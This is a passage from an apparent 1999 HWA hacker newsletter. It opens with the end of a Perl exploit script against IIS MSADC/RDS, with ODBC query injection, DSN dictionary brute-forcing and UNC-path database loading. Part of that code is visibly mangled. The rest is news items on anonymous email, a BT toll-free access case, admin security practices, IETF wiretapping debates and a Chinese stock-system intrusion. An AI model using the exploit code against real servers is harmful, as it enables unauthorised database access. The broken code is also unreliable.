$reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; my $req; if (defined $args{c}){$req=3;} else {$req=6;} $reqlen=length( make_req($req,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req($req,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## #crippled ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server not installed/query failed\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n"; close(IN);} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { # assume there's less than 500 headers if($in[$c] =~/^\x0d\x0a/){ if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;} if($error=~/server has denied access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;}} ############################################################################## #crippled ############################################################################## sub use_unc { $uncpath=$args{u}; $driverline="driver={Microsoft Access Driver (*.mdb)};dbq="; if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){ print "Your UNC path sucks. You need the following format:\n". "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; } if(create_table($driverline.$uncpath)){ if(run_query($driverline.$uncpath)){ print "Success!\n"; save ("dbq=".$uncpath); exit;}} } ############################################################################## sub get_name { # this was added last minute my $msadc=<.,?]//g; print "Machine name: $results[$base+6]\n";} ############################################################################## # special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm, # #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and # good friends!), wiretrip, l0pht, nmrc & all of phrack # # thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice # # I wish I could really name everyone, but I can't. Don't feel slighted if # your not on the list... :) ############################################################################## @HWA 06.0 Online encrypted privacy for email and WWW ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by: Ed URL: https://ca.privacyx.com/ The PrivacyX website is an anonymous and encrypted web based email system that allows you to send encrypted anonymous email through their pop3 servers, You will have to accept a signed certificate from their site and install it on your system, the site currently only offers 512 bit keys presumeably to keep the international nature of the site open. Once you have edited your config to use the mail.privacyx.com servers you are ready to send and receive email using the service. A test email sent an hr ago still has not arrived as of yet, i'll update when (if) it comes through. @HWA 07.0 More on the Chris Buckley Saga ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Abattis From http://www.theregister.co.uk/991119-000003.html Posted 19/11/99 11:56am by Linda Harrison 0800 court case adjourned... Chris Buckley, the teenager accused of using a BT 0800 number to access the Web without permission, yesterday had his case adjourned to December. The 18-year-old had his appearance at Corby Magistrates Court, Northamptonshire, put back to December 3 to enable his solicitor to take instructions. Buckley, from Oundle, Northamptonshire, allegedly used a BT freephone number to access the Net without authorisation or permission. He faces three charges: gaining unauthorised access to the Internet; posting material on newsgroups that may have caused "an annoyance"; and using profanities. Ū -=- Posted 18/05/99 11:44am by Tim Richardson Fraud charges follow abuse of BT 0800 test number An anonymous Net user has been accused of fraud and threatened with legal action for using a toll-free number to access the Web that was reserved for use by BT staff. A letter, purportedly sent by BT customer relations manager Keith Lawton, orders the unnamed customer to cough up for the 680 hours and 45 minutes spent online illegally -- or face legal action. The letter also warns the crafty BT customer that if he/she does it again, the police will be called "with a view to criminal charges being brought". Having already issued a warning to stop using the number, Lawton wrote: "By continuing to use that freephone number you have committed fraud against us." "As you have knowingly used our internal ISP without our express authorisation, we are billing you for all the time that you have been online using our freephone number by converting all time spent online to a national number," Lawton wrote. There is no indication exactly how much the bill is for but it could run into many hundreds of pounds. A spokesman for BT said the company would not comment on an individual customer's bill and also questioned the validity of the letter It could be genuine, or it could be a hoax, he said. Since no one is prepared to say one way or the other, The Register has decided to let its readers decide whether it's kosher or not. Check out the letter here: http://www.angelfire.com/ar/bt0800/ -=- Posted 19/05/99 11:44am by Tim Richardson BT fraud letter outed as a fake The letter accusing a BT customer of fraud is bogus, according to a learned reader of The Register. Matthew Garrett, a medical student at Cambridge University said: "The alleged letter from BT is a fake. "Putting it through a colour filter reveals that the BT logo in the top left corner and the bar code and footer have been scanned in and pasted on top of a computer-generated document. "Creases are also clearly visible around the staple region, but oddly enough aren't anywhere else on the page. "And as a final nail in its coffin, the background of the main page is full red, green and blue, a value that is highly unlikely to occur in nature since paper tends to be slightly off-white. "The rest of the page is plain and perfect white, which would only occur in a computer-generated image. "Hence it is fake. "If anyone can produce that with a scanner and a perfectly ordinary sheet of paper, I'd be greatly impressed. "My version of it is here, and I know there's some other enhanced copies floating around," he said. http://www-jcsu.jesus.cam.ac.uk/~mjg59/0800.jpg To see yesterday's story about the alleged fake letter, click here. After his thorough job on this little number it looks like Matthew will have no problems sailing through his post mortem course. Ū -=- non related story; Posted 12/11/99 3:41pm by Tim Richardson 22,000 people and the 08004u security lapse It seems the 22,000 or so people who gained totally toll-free access to the Net earlier this week courtesy of Scottish ISP, 08004u, didn't even have to blag their way past password security. That's because there was no security. It simply didn't exist. Any login ID and password would have got them into 08004u's network and onto the Web, The Register has learned. According to some of those who took advantage of the Scottish ISP's generosity, 08004u just left the doors wide open allowing anyone to walk in completely uncontested. "I could dial their 0800 number, and have the login IAMCOOL and password ANYTHING, and it would work," wrote one Net user who asked to remain anonymous. "I find this to be an insult to the people that are paying their Ģ50 a month [for unmetered access]," he said, revealing he was one of 08004u's subscribers. It'll be interesting to know how 08004u is planning to pay for this charity...after all, there's no such thing as a free lunch. Ū @HWA 08.0 Security Practices Today, Or Lack Thereof ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Erik A new article in the Buffer Overflow section illustrates what system administrators are doing these days in the way of security. You may be surprised, or not, at what some administrators consider to be secure computing practices. Buffer Overflow http://www.hackernews.com/orig/buffero.html Security practices today. Or lack thereof By: Erik Parker - Bio Mind Security Companies are not giving computer security the attention that it needs. I have interviewed several System Administrators and Security Administrators. What I found was what I had expected, that things just aren't getting done the way they should be. Most companies that have over 100 employees have their own computer operations staff. Unix Administrators, NT Administrators, Novell Administrators, Etc., of course all depending on the individual network. Companies that are computer companies, making software, doing internet business, or depend on every single user using their computer usually have larger network staffs, makes sense right? All too often network security is not a concern on these smaller networks. Even more sad than that, all to often it isn't a concern on larger networks. Networks with thousands of users, and a fulltime staff of administrators, or companies who have permanent in house contractors. "Network Security" is left up to the Administrators. That isn't so bad if your administrators happen to be security specialists. However, most of the time that isn't the case. Companies expect their network to be secure, or just don't expect. Many places don't have policies, or have a plan to someday start one, but don't want to bother until it becomes a problem, after they have been hacked, or an inside info starts leaking out, and the SEC is coming down their throat. We interviewed 7 Unix Administrators, and 3 NT Administrators. We didn't gain any worthwhile knowledge from the NT Administrators, as none of them knew about security or were concerned with it. If I had more time, I could have interviewed some that dealt with their own firewalls and all the network security. So from here on out, I will refer to only Unix Admins. All of the Unix Admins we interviewed were in charge of keeping their machines secure. Some were in charge of their firewall, some weren't. The Most common security practice was simply shutting down services that weren't needed. End of story. Other cases the Admins would keep lists of patch levels, and every couple of months go out and check for new versions of their daemons they were running. Many of them didn't know how to search their machines for SUID binaries, and couldn't understand why it would matter. Several others claimed that they didn't bother to shut down services, because the firewall blocked all incoming connections to those machines except on specific ports, like SMTP and HTTP. When I asked those Admins if they were in control of their entire network, some were, and some weren't. The ones who weren't, claimed to know that there were other points of entry into the network besides the firewall that controls direct access to their specific server cluster. I asked a specific set of questions to each person, I never went on to ask questions to counter their responses. Mainly because if I had, I would have been teaching them security, and putting thoughts into their head. Well, that is why this article is being written. I was surprised to hear a few administrators tell me that they didn't worry about security breaches, because there was nothing on their network that hackers or crackers would care about. I guess I had to chuckle about that. There doesn't have to be top-secret files, some new operating system, or something that is plainly obvious. Most of the hacks and cracks that you hear about, are done for web page changes. That seems to be what is in the media most often. Many hacks go unreported as well, for reasons of the stock market, embarrassment, and several Admins won't even admit to their own boss after finding out about the hack, as they think it will be thought of as their fault. Which, unless they are the security admin, and properly trained in it, it shouldn't be their fault. Companies often hire Security Penetration engineers, or if you will, strike teams, to break into their network, and test security. From outside or inside. Sometimes they don't bother to give these teams user level access, which is very stupid, since regular users could be the very problem. Also quite often a machine will be compromised via a daemon that isn't running as root, and only granting the hacker the daemons user level access, and from that they can gain root access from local exploits, the same local exploits some companies never have the strike teams check for. Some of the Security Administrators I spoke to, gave me a quick run down of what they do to secure a network. Their quick list was to setup a firewall and only allow the access that was needed. I won't go into detail about proper firewall rules and such, I don't want to get that technical here. They also said they would remove utilities that aren't going to be used on the servers. For instance, an ultra 5 with Solaris 7 on it, that has one function, to run Apache and serve web pages all day, and do nothing else. Does it need the capability to print? Does it need Openwindows or CDE installed? No. These Admins would remove packages not needed, and other ones that aren't in use by the system. Others that may be used by the Admins at some point, and are Set UID root, get their sticky bit removed. Users don't need root level access to most of these. On most systems, if you would like to see all of the files on it that are SUID root, issue this command: `find / \( -perm -4000 -o -perm -2000 ! -type d \) -exec ls -ldb {} \; >> output.log` The other things the Admins said they would do, are to keep up to date on all of the patches, and actively keep up with their software. I personally get on the maker of the software's mailing list, development lists, and user list. This makes for a pretty busy procmail, but you will catch things early on. Other things Security Admins do are to secure every machine, and any machine they aren't in control of they don't trust from anywhere on their network. They of course shut off all services not needed, like 98% of what is in /etc/inetd.conf. Any daemon that will run properly chrooted to its own directory gets set that way. Any program that can run as a non-privileged user get set that way. There is more that a dedicated Security Administrator does, but there is just too much to go through. Keep In mind that you should never install software from binary distributions if possible. With source you read the source if you wish, and compile without the extra options you may not need. Often exploits for programs are in features in the software that you didn't really need, but got compiled in by default. Something I am not touching on too much, but intrusion detection can be a good way to go as well. There are many types of software and even hardware that does it. You can monitor your systems for attacks, attempts, or full-blown break-ins. There is a software called "Anti-Sniff", that is just that.. It is a sniffer detector. If one of your machines is compromised, and someone is sniffing your network for passwords, data, or some other information, this will detect it. You can find Anti-sniff at http://www.l0pht.com/antisniff/. We also recommend for networks with more than a couple machines, setting up a dedicated log host. This machine serves ONE function, and one alone, to log. You setup all your remote machines to have their syslog piped off to this machine. It doesn't need to be a huge box, or an expensive box. I have used a 486-100, running Linux on it, and had 35 servers logging to it. Put a 20 gig drive in it, and have it compress logs every so often. Works like a dream. If you use a big server for it, you will often find your management having this "Great Idea" to use it to run other services as well. I personally have been asked before to make our loghost the ssh gateway from the outside, I hope you can see the problems in that yourself. Something else that is difficult for companies to understand and put up with, and many don't, and end up suffering because of it, are the fact that many skilled Administrators spend a lot of time associating them selves with what would be classified by the media and the US government as Black hat hackers. However, they are the very people we are protecting networks against, and they often get information before we do. They are often a great resource for information, and even for tips when you have questions. You have to know both sides to be successful. We aren't hurting them any by securing the networks. There will always be networks out there that aren't secure. It also gives them more of a challenge in life, which is often something they consider fun. I personally don't believe in the labeling of White hats or Black hats, as many people who are considered to be black hats, go to work every day in a suit and tie, get paid 150k a year, and are the best security administrators there are. There isn't a ton like that, but some of them are batting for both teams. What would that make them, gray hats? There is a bigger problem that exists. It is what we call Upper Management. You know, the person who signs your purchase orders, gives you your paycheck, and the same person who never thinks about security. It costs money, and that is bad. They think because they don't see a problem, don't fix. What stupid logic that is. You won't ever see a skilled hacker, as they will come in, get what they want, and disappear and perhaps never run across your network again. I think it is much better to have a cracker hit a site, than a hacker. I'd much rather have a server erased, or a web page changed, than to have a hacker come in, and rip off software, or documents, or project plans that my company has been working on for years, and sell it to competitors, or post them on some stock board, and make my company's stock fall 50%. Upper management doesn't care about that. They either don't understand what security is, or just don't think it could happen to them. The problem is, you will rarely, most likely never look like a hero at your company. If you do get the go ahead to do serious security work, hire an outsider, or hire a fulltime security admin, and they do a good job, you won't get hacked. Life goes on as it was, and it seems like a waste of money. Your boss doesn't lose sleep at night thinking about how insecure your network is, but you might, since it is your fault either way if it gets hacked. If you don't implement security, then you are certainly not shown off as a hero, unless you track him down, file suit, and he happens to be rich, and your company makes a boatload of money. Not likely going to happen, once its reported to the FBI, and they do their research, and maybe even raid someone, its years later, and you have moved on to a new company. You have to think up every single problem on the network, what could happen, and show it to your boss. Make a chart, show problems, and show costs. In most cases the cost of cleanup, and potential loss of money, is far more than hiring a security staff. Some Upper Management understand more clearly if you put it simply, such as "Do you get the oil in your Porsche changed from every three to five months? Even though nothing was wrong?". Most likely they do, or at least know that they SHOULD. That is a fact, that keep up the maintenance schedule, and you have less problems. Well, same way with computers. It is difficult in most companies, very difficult. Even worse if you are working for the government, since every penny has to be cleared, and it takes time. Most of the time you either end up doing it and never getting recognized, or paid. If you don't have the time, well, that would explain why you see so many government cracks listed on web page defacement sites like attrition.org. It is a difficult job, and if you work for a consulting company, you are in luck. It most likely isn't your job to sell the audits, you just do them for the company who was convinced that they needed it. You do have a harder job though, and that is writing up a security policy, and making the company understand they MUST follow it. Many just want their network locked down, and don't are about a policy. If you only care about the money, so be it. If you care about doing the best job you can, getting the security done right, you need to make them understand they have to make your security policy, well, policy. Security today, and in the past, just isn't what it needs to be. Most companies consider it to be a pain, and an expense that isn't needed or justified. Companies need to focus on the area, and big companies need to hire a fulltime security admin, or keep an open account with a contractor for routine security audits, and have their administrators trained on keeping up to date on things. All companies should have someone who monitors mailing lists like Bugtraq, or NT Bugtraq, depending on what platforms you are running. Things need to change, and if you are in a position where you can do that, I suggest you do it right now. If you firmly believe in the future of the Internet, and E-commerce, I also know that if I were the only person buying things on-line, every e-commerce site would shut down, because I just can't afford to keep them all going. I've talked to a couple of people who say they won't buy anything online. They don't think their credit cards are secure, or their personal information. People are scared of it, and they keep hearing about hackers, and all these evil things going on that they don't understand. Many web sites try to comfort people, by explaining the encryption method for the browsers, and leave it at that. For the people who have been living under rocks, and have only heard about credit card stealing, and not about hacking, and computers being compromised, or for the people who just don't understand what that means, they think their data going encrypted is all there is to it. Many people don't realize when hackers get credit card numbers, they get them in bulk usually, rarely from sniffing, but from compromising the machine that holds these plain text files, or databases holding the information. @HWA 09.0 Internet Wiretapping Still a Possibility ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion While approximately fifty-five percent of the Internet Engineering Task Force voted against a measure to include wiretapping capabilities into new protocols there was not a high enough objection to close the issue permanently. The director of the transport area of the IETF said that unless the proposal receive a much stronger objection the possibility of including these features still exists. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html?chkpt=zdnnstop -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Internet wiretapping still a threat By Robert Lemos, ZDNN November 11, 1999 5:24 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html A push by law enforcement to make the Internet wiretap-friendly hit a major snag on Wednesday, when members of the Internet Engineering Task Force -- the body responsible for setting Internet standards -- overwhelmingly said 'no' to a key question. The question: Should the IETF put features in forthcoming protocols whose sole purpose is to facilitate wiretapping? Scott Bradner, director of the Transport Area of the IETF -- where the motion was originally proposed -- estimates that 55 percent of the members answered 'no,' another 15 percent said 'yes,' and the rest abstained. Not resolved While that may seem definitive, Bradner stressed that the issue remains open. "The IETF doesn't vote; we work on rough consensus," said Bradner, who stressed that without a large majority -- say, 80 percent -- of its members voting one way, the issue would not be resolved. "After the meeting, we are still in somewhat of an ambiguous area," he said. "There is clearly not strong support for doing it, but there is not strong enough support to definitively block wiretapping from future standards." That leaves the issue tabled for the moment, but certain to be brought up again. "This is just the beginning," said Jim Dempsey, senior staff counsel with the policy think tank Center for Democracy and Technology, who attended the meeting. "The vote was about 10 to 1 against, but that won't stop it." Expanding wire-tapping The whole Internet wiretapping concept is a direct result of the Communications Assistance for Law Enforcement Act of 1994, which requires telecommunications companies to aid law enforcement in legally obtained wiretaps by making their network infrastructure wiretap-friendly. For the past two years, law enforcement officials have been lobbying Congress and putting pressure on cellular phone companies to apply the law to their phone network as well. The Internet is the next communications network on the list. "If it is a one or a zero, or an analog signal, the government is entitled to intercept the signal," said CDT's Dempsey. "But does that mean they can force companies to design their systems to make it easy to get the signals they want, when they want it? That's the CALEA question." Privacy advocates such as the Electronic Privacy Information Center spoke out adamantly against a pro-wiretapping Internet. "... We believe that such a development would harm network security, result in more illegal activities, diminish users' privacy, stifle innovation, and impose significant costs on developers of communications," wrote EPIC in an open letter to the IETF. "At the same time, it is likely that Internet surveillance protocols would provide little or no real benefit for law enforcement." Fear of hacking The IETF answered more out of security concerns than any thoughts about privacy, said Bradner. "If you put in some mechanism where someone with legal authority can tap your telephone, what stops some hacker from doing that?" he asked. The FBI could not be reached for comment on the issue. In any event, the whole debate may be moot. The vote just barred specific development of features solely for wiretapping, but other pieces already present in the Internet could be used to create an effective wiretap. "Some people think that all the functions necessary to do an intercept may already be in the protocol for other reasons," said Bradner. For example, the Internet allows servers to do accounting: Finding out where a packet came from and where it is going. In wiretapping, such a feature is called a pen register and is considered the first step in narrowing down the calls that need to be tapped. CDT's Dempsey believes the vote may be moot for a different reason. "Two thousand engineers get in a ballroom and raise their hands -- that means nothing to the government," he said. "What it DOES mean is that they will have to go to the CEOs ... and make their case." @HWA 10.0 Stock Prices Manipulated in China ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Zhao Zhe, 28 and a former trust firm employee, received three years of jail time from a Chinese court and was ordered to pay restitution for breaking into a computerized trading system, and manipulating stock data. This allowed the pair to sell shares at higher prices. CNNNfn http://www.cnnfn.com/1999/11/12/emerging_markets/wires/china_hacker_wg/ Wired http://www.wired.com/news/reuters/0,1349,32512,00.html Nando Times http://www.techserver.com/noframes/story/0,2294,500057111-500094072-500360224-0,00.html CNNNfn Chinese hacker jailed Former trust firm staffer found guilty of hacking into stock system November 12, 1999: 10:24 a.m. ET SHANGHAI (Reuters) - A Chinese court jailed a former trust firm worker for three years Friday for hacking into a computerized stock trading system and manipulating prices, a court official said. The Shanghai court found Zhao Zhe, 28, guilty of rigging stock data so that he could sell shares at inflated prices, he said. Zhao, a forme